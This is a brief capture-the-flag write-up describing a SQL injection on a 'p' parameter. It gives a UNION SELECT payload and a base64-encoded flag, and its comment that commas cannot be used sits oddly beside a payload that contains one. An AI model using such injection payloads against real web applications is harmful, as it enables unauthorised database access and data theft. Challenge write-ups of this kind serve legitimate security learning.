There is a SQLinjection on the p parameter.
However, we must not use commas, since our output gets split by those.
Therefore, we can use this output:
```
2,10 UNION SELECT * from flag
```
We get RU5Pe1NRTDFfVzF0aF8wdVRfQzBtbTRfVzBya3NfU29tZUhvd19BZ0Exbl9BbmRfQWc0MW4hfQ== which is the flag in base64